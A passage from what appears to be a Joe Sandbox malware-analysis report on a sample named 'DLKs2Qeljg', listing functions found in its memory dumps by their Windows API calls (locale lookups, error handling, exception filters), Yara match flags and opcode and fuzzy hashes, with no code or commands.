                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2016158738-0
                                                                                                        • Opcode ID: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                                                        • Instruction ID: 0f8fa0eaf75f611a60fe6125075e7f01e9a2a12d67a71318116139f67030cc46
                                                                                                        • Opcode Fuzzy Hash: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                                                        • Instruction Fuzzy Hash: DB11253B2047019FDB1C9F38C8A16BABB92FF80358B14442DEE5787B40D771AA02CB40
                                                                                                        APIs
                                                                                                          • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B603,00000000,00000000,?), ref: 0043B891
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InfoLocale_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 787680540-0
                                                                                                        • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                        • Instruction ID: 482b5923cda5358eb0558da95ee496ac7efb878bedc9635b3893494dc5c9647c
                                                                                                        • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                        • Instruction Fuzzy Hash: 3DF0F932910116ABDB2CAA658C057BB775CEF44714F15542AEE05A3280EB39BE4586D8
                                                                                                        APIs
                                                                                                          • Part of subcall function 02152131: GetLastError.KERNEL32(?,?,0214A9DC,?,00000000,?,0214CDD6,02122474,00000000,?,00451F20), ref: 02152135
                                                                                                          • Part of subcall function 02152131: _free.LIBCMT ref: 02152168
                                                                                                          • Part of subcall function 02152131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521A9
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0215B86A,00000000,00000000,?), ref: 0215BAF8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InfoLocale_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 787680540-0
                                                                                                        • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                        • Instruction ID: d6f137baabc158644097bfe9a4e64a76b9a914215adeafc563c48ad778a6e287
                                                                                                        • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                        • Instruction Fuzzy Hash: AAF0FE32648525EBDB345A158C45BBB7758DB4071CF0545A5DC65A3148D7B0BF01C6D0
                                                                                                        APIs
                                                                                                          • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,004307A5,?,0043B9D6,004307A5,?,?,?,?,?,004307A5,?,?), ref: 0043B3A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2016158738-0
                                                                                                        • Opcode ID: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                        • Instruction ID: 4cae78c4b35d7b4c31765c23ce642d4c98f9d5783de0998693dc6c617ff1b9a7
                                                                                                        • Opcode Fuzzy Hash: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                        • Instruction Fuzzy Hash: 65F0C2362003045FDB149F399C92B7A7B95EF85768F15452EFE058B690D7B59C028788
                                                                                                        APIs
                                                                                                          • Part of subcall function 02152131: GetLastError.KERNEL32(?,?,0214A9DC,?,00000000,?,0214CDD6,02122474,00000000,?,00451F20), ref: 02152135
                                                                                                          • Part of subcall function 02152131: _free.LIBCMT ref: 02152168
                                                                                                          • Part of subcall function 02152131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521A9
                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,02150A0C,?,0215BC3D,02150A0C,?,?,?,?,?,02150A0C,?,?), ref: 0215B60B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2016158738-0
                                                                                                        • Opcode ID: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                        • Instruction ID: 14d6272e1638ab1395fc4dfeb3474677bd890f6ba89009790a4b1a034123db5b
                                                                                                        • Opcode Fuzzy Hash: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                        • Instruction Fuzzy Hash: FCF046363043049FDB145F398C80B7ABBD2EF8032CF14446CFE068B680D77199028B44
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0215046A,?,00000004), ref: 0215546A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                        • Instruction ID: c8cf4af4ea003dfb321a7ca11d37d9e268f580d9fae8dfdeb656df6474edd102
                                                                                                        • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                        • Instruction Fuzzy Hash: 9DF0F031680328FFDB01AF60DC01F6E7B62EF04B12F504095FD1566290DB729A20AA8A
                                                                                                        APIs
                                                                                                          • Part of subcall function 0042E3DD: EnterCriticalSection.KERNEL32(?,?,00431C6A,?,00457A38,00000008,00431D38,?,?,?), ref: 0042E3EC
                                                                                                        • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 00434DF5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1272433827-0
                                                                                                        • Opcode ID: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                                                        • Instruction ID: c332caa31248a9acf2554114107b558261535c1db87f4a35068870b0348f85c5
                                                                                                        • Opcode Fuzzy Hash: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                                                        • Instruction Fuzzy Hash: 30F04F32A103049FD710EF69E906B8D37F0AB05726F10426AF914DB2E2CBB999808F49
                                                                                                        APIs
                                                                                                          • Part of subcall function 0214E644: RtlEnterCriticalSection.NTDLL(01CD0DA5), ref: 0214E653
                                                                                                        • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 0215505C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1272433827-0
                                                                                                        • Opcode ID: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                                                        • Instruction ID: 1133461ae7f7d575bf66e1ef7f7affe53899c18a4ce926261a2626437773c602
                                                                                                        • Opcode Fuzzy Hash: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                                                        • Instruction Fuzzy Hash: 79F03C32A50304EFEB10EF68D905B4D77F2AF05721F104166F914DB2A1CB7599408F49
                                                                                                        APIs
                                                                                                          • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0043BA34,004307A5,?,?,?,?,?,004307A5,?,?,?), ref: 0043B2A9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2016158738-0
                                                                                                        • Opcode ID: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                                                        • Instruction ID: ba7890fb8fc5eb9f8b971137117999a11d29cf1203cf16992e0f29a4d0b5929f
                                                                                                        • Opcode Fuzzy Hash: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                                                        • Instruction Fuzzy Hash: B6F0203A30020497CB049F76D81976BBF90EFC5754F0A409AEB058B250C6399842C794
                                                                                                        APIs
                                                                                                          • Part of subcall function 02152131: GetLastError.KERNEL32(?,?,0214A9DC,?,00000000,?,0214CDD6,02122474,00000000,?,00451F20), ref: 02152135
                                                                                                          • Part of subcall function 02152131: _free.LIBCMT ref: 02152168
                                                                                                          • Part of subcall function 02152131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521A9
                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0215BC9B,02150A0C,?,?,?,?,?,02150A0C,?,?,?), ref: 0215B510
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2016158738-0
                                                                                                        • Opcode ID: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                                                        • Instruction ID: f2421f2db791b8ddda1441e031945d4c5ca3ad3c0b9320a9cb4686521564db34
                                                                                                        • Opcode Fuzzy Hash: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                                                        • Instruction Fuzzy Hash: A6F0553A3402049BCB189F35DC4476ABF90EFC1754F0A0099EF068B240C3319942C790
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00010662,0040FBEF), ref: 0041065B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                        • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                                                        • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00410662,0212FE56), ref: 021308C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                        • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                                                        • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 54951025-0
                                                                                                        • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                        • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                        • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                        • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                        • Instruction ID: 417346d0ae02fd64553672aa1fcdcaceb5e3fedd873b6eafe9f940146e5e92a3
                                                                                                        • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                        • Instruction Fuzzy Hash: 7A324762D69F014DE7339634C822336A298AFBB3D4F15E737E855B5EA6EB2CC4834105
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fc8bcc6d872457df4fed260bc572b758efad88b86b8dd348daf776b4907b3949
                                                                                                        • Instruction ID: cfe2422a6546bef1f61d45af2200ef59159d57cedd5e010ca0acbe3f63374a03
                                                                                                        • Opcode Fuzzy Hash: fc8bcc6d872457df4fed260bc572b758efad88b86b8dd348daf776b4907b3949
                                                                                                        • Instruction Fuzzy Hash: 0CE1A570A08616EFD714CF28C590AA6B7F1FF48304B14456EE842ABB91D738FC61DB96
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                        • Instruction ID: 125b84b3d877400c56a79d46aee6f970073bb804cb4d241e004fd4a133c386d5
                                                                                                        • Opcode Fuzzy Hash: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                        • Instruction Fuzzy Hash: 42D1C7721481A34ACB6D4A39847403AFFE26B421A530E47AEE4FBCE5C2EF24D556D660
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                        • Instruction ID: 53b12877abe9f5bd80a2a3f521651de355e01c50a7045b8389fd82b7b4b17ed8
                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                        • Instruction Fuzzy Hash: 5B91627230D0B34ADB294639953503FFFE15A523A139A079FE4F2CA2C5EE288965D624
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                        • Instruction ID: 485f5422381870043fa44f5408ca97ec0d27a29610c3fe789144f33de3168146
                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                        • Instruction Fuzzy Hash: 219183722480A34EEB6D463A887403EFFE15B426B570B079EE4FACB1C1EF24D565D620
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                        • Instruction ID: 840c7d605cd247ab055e93d746b7d566013b7b825f8c517892cae8bc4eeb6456
                                                                                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                        • Instruction Fuzzy Hash: 6991637230A0B34EDB694639A53403FFFE15A523A135A079FD4F2CB2C5EE1C8965D624
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                        • Instruction ID: 87bb025b6d1c7183db46d0b48413cdab076d1968fd8d362944fb1a5d9cbfe3da
                                                                                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                        • Instruction Fuzzy Hash: 16914E722490A34AEB6E467A893413EFFE15B422A530F079DD4FACA1C5FF24C165E620
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                        • Instruction ID: 65de86ff63b49bdc759aa5d57c760241c770973215aaf00ccaa693d1692859fd
                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                        • Instruction Fuzzy Hash: 8A91527230D0B34ADB2D463AA47403FFFE15A523B135A079FD4F2CA2C5EE189A55D624
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                        • Instruction ID: 958dc627692676a5b606bbe2c59a90686d69c3a42038f5ce980e0011389336de
                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                        • Instruction Fuzzy Hash: D79194722490A30EDB6E4639857413EFFE15B421A131A0BAEE4FACE1C5EF14D556D620
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                                                        • Instruction ID: d33dadf552dc057ac98c398fef9b4cf1a6c5eb0b8cd52ebb4b7201ad2176a4fd
                                                                                                        • Opcode Fuzzy Hash: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                                                        • Instruction Fuzzy Hash: 446157B1F0063576DA385A28B895BBF63949F41748FE0041FE446DB381DA9DED82864E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                        • Instruction ID: 285c9facdd1fe183155013a383779f600324247270f52d8a42817e881f3aad06
                                                                                                        • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                        • Instruction Fuzzy Hash: 2E616A716C07066ADF389E68B855BBE63959F41F0CF10087AE98EDB2C0DF11D942CB56
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                        • Instruction ID: 93cadbc9e56ee973348f3b1b45f0aee1066a3e574f5d0b7d1e0efa6f5899e2a2
                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                        • Instruction Fuzzy Hash: 8581637230D1B34AEB294239957843FFFE15A523A135A079FD4F2CA2C1EE18CA55D624
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                        • Instruction ID: f277dedf8d4a940b713cd712a76d6676b397590ba8e92f559259465b708ad42c
                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                        • Instruction Fuzzy Hash: B38164722480A34EEB6E463A847443EFFE15B421A531E079EE4FACA1C5FF24C256D620
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction ID: 140c30f2401bdd3d55fd39f42844b97d2838e8a2e1dc8557d0850e1b510d1eed
                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction Fuzzy Hash: B211297730306167D6148A2DF8B45BFA795EAD53207EC426FD0414B744CE2AE9C19508
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction ID: 964c88d0f0d5f7dd8e546c60d416d473fa195e786a463a5b99e10b4154792963
